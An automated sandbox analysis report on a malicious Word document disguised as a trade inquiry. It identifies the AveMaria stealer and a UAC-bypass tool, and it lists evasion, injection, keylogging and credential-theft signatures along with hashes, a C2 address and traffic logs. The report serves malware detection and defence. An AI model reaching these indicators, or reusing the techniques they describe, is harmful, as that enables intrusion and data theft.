Windows Analysis Report
Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc

Overview

General Information

Sample Name: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
Analysis ID: 708250
MD5: 9bc102ffb0930f5dee65bde8e0ba6d89
SHA1: 37cac7507a6ad02a75d947a9bdfe115f2da8b71b
SHA256: 959837140aee207e9fd845a030881f9430364d2df8088845f5828579420b1717
Tags: doc
Infos:

Detection

AveMaria, UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Yara detected AntiVM3
Document exploit detected (creates forbidden files)
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Document contains OLE streams with names of living off the land binaries
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Powershell drops PE file
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Bypasses PowerShell execution policy
Contains functionality to hide user accounts
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found suspicious RTF objects
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc ReversingLabs: Detection: 32%
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc Virustotal: Detection: 50% Perma Link
Yara detected AveMaria stealer
Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\eDdYRRbouy.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\explorer.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 8.2.explorer.exe.3a2b638.11.unpack Avira: Label: TR/AD.MortyStealer.utbzg
Source: 17.0.MSBuild.exe.400000.0.unpack Avira: Label: TR/Redcap.ghjpt
Source: 00000011.00000003.963762920.00000000006D8000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: AveMaria {"C2 url": "20.126.95.155", "port": 7800}

Exploits
barindex
Yara detected UACMe UAC Bypass tool
Source: Yara match File source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 2040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory created: C:\Program Files\Microsoft DN1 Jump to behavior
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdbXr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB[xp source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdbDr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbUy source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities
barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: explorer[1].exe.0.dr Jump to dropped file
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
